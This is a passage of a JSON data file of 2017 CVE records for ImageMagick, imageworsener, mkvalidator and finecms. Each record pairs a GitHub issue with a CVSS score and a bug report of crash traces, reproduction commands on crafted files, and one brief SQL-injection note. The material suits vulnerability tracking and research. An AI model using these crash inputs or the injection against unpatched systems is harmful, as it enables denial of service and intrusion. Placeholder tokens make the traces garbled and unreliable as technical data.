NUMBERTAG b NUMBERTAG aa NUMBERTAG b NUMBERTAG ab NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG ab NUMBERTAG b NUMBERTAG ac NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG ac NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG dso NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG da NUMBERTAG PATHTAG NUMBERTAG bf NUMBERTAG bf NUMBERTAG stack] APITAG of process memory map. APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG b NUMBERTAG fa4c1 ( PATHTAG NUMBERTAG b NUMBERTAG fe6a9 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG be NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG bf5e9 ( PATHTAG NUMBERTAG b NUMBERTAG f4d NUMBERTAG in __interceptor_posix_memalign ( PATHTAG NUMBERTAG e NUMBERTAG d in APITAG APITAG NUMBERTAG fa NUMBERTAG in APITAG APITAG NUMBERTAG bc in APITAG APITAG NUMBERTAG d in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG f0 in APITAG APITAG NUMBERTAG f0 in APITAG APITAG NUMBERTAG c8 in APITAG APITAG NUMBERTAG bb NUMBERTAG in APITAG APITAG NUMBERTAG ea0ba0 in APITAG APITAG NUMBERTAG fa NUMBERTAG d1 in APITAG APITAG NUMBERTAG e7a in APITAG APITAG NUMBERTAG a in main APITAG NUMBERTAG b6e NUMBERTAG a NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG ba ( PATHTAG ) POC URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12692",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/653",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/653",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-06T06:10:56Z",
        "description": "memory exhaustion in APITAG PATHTAG magick convert oom APITAG /dev/null NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG bytes of APITAG NUMBERTAG APITAG memory map follows NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG ffff NUMBERTAG b2d NUMBERTAG b2e NUMBERTAG b2f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b3a NUMBERTAG b3b NUMBERTAG b3c NUMBERTAG b3d NUMBERTAG b3e NUMBERTAG b3f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b4a NUMBERTAG b4b NUMBERTAG b4c NUMBERTAG b4d NUMBERTAG b4e NUMBERTAG b4f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5ac NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG PATHTAG NUMBERTAG b5c NUMBERTAG b6dfa NUMBERTAG b6dfa NUMBERTAG b6e1e NUMBERTAG PATHTAG NUMBERTAG b6e1e NUMBERTAG b6e1f NUMBERTAG PATHTAG NUMBERTAG b6e1f NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6fce NUMBERTAG PATHTAG NUMBERTAG b6fce NUMBERTAG b6fd NUMBERTAG PATHTAG NUMBERTAG b6fd NUMBERTAG b6fd NUMBERTAG PATHTAG NUMBERTAG b6fd NUMBERTAG b6fd NUMBERTAG b6fd NUMBERTAG b6fec NUMBERTAG PATHTAG NUMBERTAG b6fec NUMBERTAG b6fed NUMBERTAG PATHTAG NUMBERTAG b6fed NUMBERTAG b6fee NUMBERTAG PATHTAG NUMBERTAG b6fee NUMBERTAG b6ff NUMBERTAG b6ff NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG fa NUMBERTAG b NUMBERTAG fa NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG dso NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG bf NUMBERTAG bf NUMBERTAG stack] APITAG of process memory map. APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG b NUMBERTAG d NUMBERTAG c1 ( PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG a9 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG b NUMBERTAG dbe NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG cc NUMBERTAG a in __interceptor_malloc ( PATHTAG NUMBERTAG b4eb in APITAG APITAG NUMBERTAG c8 in APITAG APITAG NUMBERTAG bb NUMBERTAG in APITAG APITAG NUMBERTAG ea0ba0 in APITAG APITAG NUMBERTAG fa NUMBERTAG d1 in APITAG APITAG NUMBERTAG e7a in APITAG APITAG NUMBERTAG a in main APITAG NUMBERTAG b6e3ea NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG ba ( PATHTAG ) POC URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12693",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/652",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/652",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-06T05:40:03Z",
        "description": "memory exhaustion in APITAG in APITAG PATHTAG magick version Version: APITAG NUMBERTAG Q NUMBERTAG i NUMBERTAG FILETAG PATHTAG magick convert oom APITAG FILETAG NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG a NUMBERTAG a NUMBERTAG bytes of APITAG NUMBERTAG APITAG memory map follows NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG ffff NUMBERTAG b2d NUMBERTAG b2e NUMBERTAG b2f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b3a NUMBERTAG b3b NUMBERTAG b3c NUMBERTAG b3d NUMBERTAG b3e NUMBERTAG b3f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b4a NUMBERTAG b4b NUMBERTAG b4c NUMBERTAG b4d NUMBERTAG b4e NUMBERTAG b4f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5ae NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c6c NUMBERTAG b5c6c NUMBERTAG b5c6d NUMBERTAG PATHTAG NUMBERTAG b5c6d NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e4a NUMBERTAG PATHTAG NUMBERTAG b6e4a NUMBERTAG b6e4b NUMBERTAG PATHTAG NUMBERTAG b6e4b NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff NUMBERTAG b6ffa NUMBERTAG b6ffa NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG aa NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG aa NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG dso NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG bfc NUMBERTAG bfc6a NUMBERTAG stack] APITAG of process memory map. APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG b NUMBERTAG f NUMBERTAG c1 ( PATHTAG NUMBERTAG b NUMBERTAG fc6a9 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG bc NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG bd5e9 ( PATHTAG NUMBERTAG b NUMBERTAG f2d NUMBERTAG in __interceptor_posix_memalign ( PATHTAG NUMBERTAG e NUMBERTAG b in APITAG APITAG NUMBERTAG e NUMBERTAG b in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG c8 in APITAG APITAG NUMBERTAG bb NUMBERTAG in APITAG APITAG NUMBERTAG ea0ba0 in APITAG APITAG NUMBERTAG fa NUMBERTAG d1 in APITAG APITAG NUMBERTAG e7a in APITAG APITAG NUMBERTAG a in main APITAG NUMBERTAG b6e NUMBERTAG a NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG ba ( PATHTAG ) POC: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12774",
        "Issue_Url_old": "https://github.com/yzcrnx/finecms/issues/1",
        "Issue_Url_new": "https://github.com/yzcrnx/finecms/issues/1",
        "Repo_new": "yzcrnx/finecms",
        "Issue_Created_At": "2017-08-09T01:04:59Z",
        "description": "finecms. finecms version in NUMBERTAG in PATHTAG here has a sql injection . use function APITAG ERRORTAG POC: APITAG use APITAG to inject it ERRORTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2017-12779",
        "Issue_Url_old": "https://github.com/Matroska-Org/foundation-source/issues/24",
        "Issue_Url_new": "https://github.com/matroska-org/foundation-source/issues/24",
        "Repo_new": "matroska-org/foundation-source",
        "Issue_Created_At": "2017-08-14T02:21:00Z",
        "description": "Multiple bugs NUMBERTAG the APITAG function in PATHTAG in mkvalidator NUMBERTAG can cause a denial of APITAG pointer dereference and application crash) via a crafted mkv file. ./mkvalidator APITAG debug info: Program received signal SIGSEGV, Segmentation fault NUMBERTAG in APITAG (p NUMBERTAG Id NUMBERTAG Type NUMBERTAG at PATHTAG NUMBERTAG for (i=p APITAG APITAG (gdb) bt NUMBERTAG in APITAG (p NUMBERTAG Id NUMBERTAG Type NUMBERTAG at PATHTAG NUMBERTAG cb NUMBERTAG in APITAG APITAG at APITAG NUMBERTAG cf NUMBERTAG in APITAG APITAG at APITAG NUMBERTAG in main (argc NUMBERTAG arg NUMBERTAG fffffffdf NUMBERTAG at APITAG (gdb) disassemble Dump of assembler code for function APITAG NUMBERTAG APITAG : push %rbp NUMBERTAG APITAG : mov %rsp,%rbp NUMBERTAG APITAG : mov %rdi NUMBERTAG rbp NUMBERTAG b APITAG : mov %rsi NUMBERTAG rbp NUMBERTAG f APITAG : mov %rd NUMBERTAG rbp NUMBERTAG APITAG : mo NUMBERTAG rbp),%ra NUMBERTAG APITAG : shl NUMBERTAG ra NUMBERTAG b APITAG : or NUMBERTAG rbp),%ra NUMBERTAG f APITAG : mov %ra NUMBERTAG rbp NUMBERTAG APITAG : mo NUMBERTAG rbp),%ra NUMBERTAG APITAG : mo NUMBERTAG rax),%ra NUMBERTAG b APITAG : mov %ra NUMBERTAG rbp NUMBERTAG f APITAG : jmp NUMBERTAG APITAG NUMBERTAG APITAG : mo NUMBERTAG rbp),%ra NUMBERTAG APITAG : mo NUMBERTAG rax),%ra NUMBERTAG APITAG : cmp NUMBERTAG rbp),%ra NUMBERTAG d APITAG : jne NUMBERTAG APITAG NUMBERTAG f APITAG : mo NUMBERTAG rbp),%ra NUMBERTAG APITAG : add NUMBERTAG ra NUMBERTAG APITAG : jmp NUMBERTAG a0 APITAG NUMBERTAG APITAG : mo NUMBERTAG rbp),%ra NUMBERTAG d APITAG : mov (%rax),%rax Type APITAG to continue, or q APITAG to quit q Quit (gdb) i r ra NUMBERTAG rb NUMBERTAG rc NUMBERTAG ffff7b NUMBERTAG rd NUMBERTAG rsi NUMBERTAG rdi NUMBERTAG rbp NUMBERTAG fffffffb NUMBERTAG fffffffb NUMBERTAG rsp NUMBERTAG fffffffb NUMBERTAG fffffffb NUMBERTAG r NUMBERTAG e NUMBERTAG r NUMBERTAG fffffffb NUMBERTAG r NUMBERTAG fffffffffffffa NUMBERTAG r NUMBERTAG r NUMBERTAG r NUMBERTAG fffffffdf NUMBERTAG r NUMBERTAG r NUMBERTAG rip NUMBERTAG APITAG eflags NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12804",
        "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/30",
        "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/30",
        "Repo_new": "jsummers/imageworsener",
        "Issue_Created_At": "2017-08-06T06:01:53Z",
        "description": "memory exhausted in iwgif_init_screen . PATHTAG imagew oom iwgif_init_screen1 imout/out outfmt png oom iwgif_init_screen1 \u2192 imout/out NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG eb NUMBERTAG bytes of APITAG NUMBERTAG APITAG memory map follows NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b4a NUMBERTAG b4b NUMBERTAG b4c NUMBERTAG b4d NUMBERTAG b4e NUMBERTAG b4f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5b NUMBERTAG b5c NUMBERTAG b5d NUMBERTAG b5d8f NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG b6f3f NUMBERTAG PATHTAG NUMBERTAG b6f3f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG b6f5f NUMBERTAG PATHTAG NUMBERTAG b6f5f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG PATHTAG NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG b6f NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG c NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG d NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG f NUMBERTAG b NUMBERTAG fc NUMBERTAG b NUMBERTAG fd NUMBERTAG b NUMBERTAG ff NUMBERTAG b NUMBERTAG ff NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG dso NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG a NUMBERTAG PATHTAG NUMBERTAG bfcd NUMBERTAG bfcf NUMBERTAG stack] APITAG of process memory map. APITAG CHECK failed: PATHTAG \"((\"unable to mmap NUMBERTAG b NUMBERTAG a4c1 ( PATHTAG NUMBERTAG b NUMBERTAG e6a9 in APITAG const , int, char const , unsigned long long, unsigned long long) ( PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG e NUMBERTAG b ( PATHTAG NUMBERTAG b NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG a in __interceptor_malloc ( PATHTAG NUMBERTAG in iw_malloc_ex src/imagew APITAG NUMBERTAG in iw_malloc_large src/imagew APITAG NUMBERTAG dee NUMBERTAG in iwgif_init_screen src/imagew APITAG NUMBERTAG dee NUMBERTAG in iwgif_read_image src/imagew APITAG NUMBERTAG e NUMBERTAG c4 in iwgif_read_main src/imagew APITAG NUMBERTAG e NUMBERTAG c4 in iw_read_gif_file src/imagew APITAG NUMBERTAG ad in iwcmd_run src/imagew APITAG NUMBERTAG b0 in iwcmd_main src/imagew APITAG NUMBERTAG a NUMBERTAG a in main src/imagew APITAG NUMBERTAG b6f7ca NUMBERTAG in __libc_start_main ( PATHTAG NUMBERTAG ae2f ( PATHTAG ) POC URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2017-12805",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/664",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/664",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2017-08-10T05:00:53Z",
        "description": "memory exhaustion in APITAG PATHTAG convert oom APITAG /dev/null NUMBERTAG ERROR: APITAG failed to allocate NUMBERTAG bytes of APITAG NUMBERTAG APITAG memory map follows NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG ffff NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b2a NUMBERTAG b2b NUMBERTAG b2c NUMBERTAG b2d NUMBERTAG b2e NUMBERTAG b2f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b3a NUMBERTAG b3b NUMBERTAG b3c NUMBERTAG b3d NUMBERTAG b3e NUMBERTAG b3f NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b4a NUMBERTAG b4b NUMBERTAG b4c NUMBERTAG b4d NUMBERTAG b4e NUMBERTAG b4f NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b NUMBERTAG b5a NUMBERTAG b5ae NUMBERTAG b5c NUMBERTAG b5c NUMBERTAG b5c6a NUMBERTAG b5c6a NUMBERTAG b5c6b NUMBERTAG PATHTAG NUMBERTAG b5c6b NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e NUMBERTAG PATHTAG NUMBERTAG b6e NUMBERTAG b6e4a NUMBERTAG PATHTAG NUMBERTAG b6e4a NUMBERTAG b6e4b NUMBERTAG PATHTAG NUMBERTAG b6e4b NUMBERTAG b6e4c NUMBERTAG PATHTAG NUMBERTAG b6e4c NUMBERTAG b6ff NUMBERTAG PATHTAG NUMBERTAG b6ff 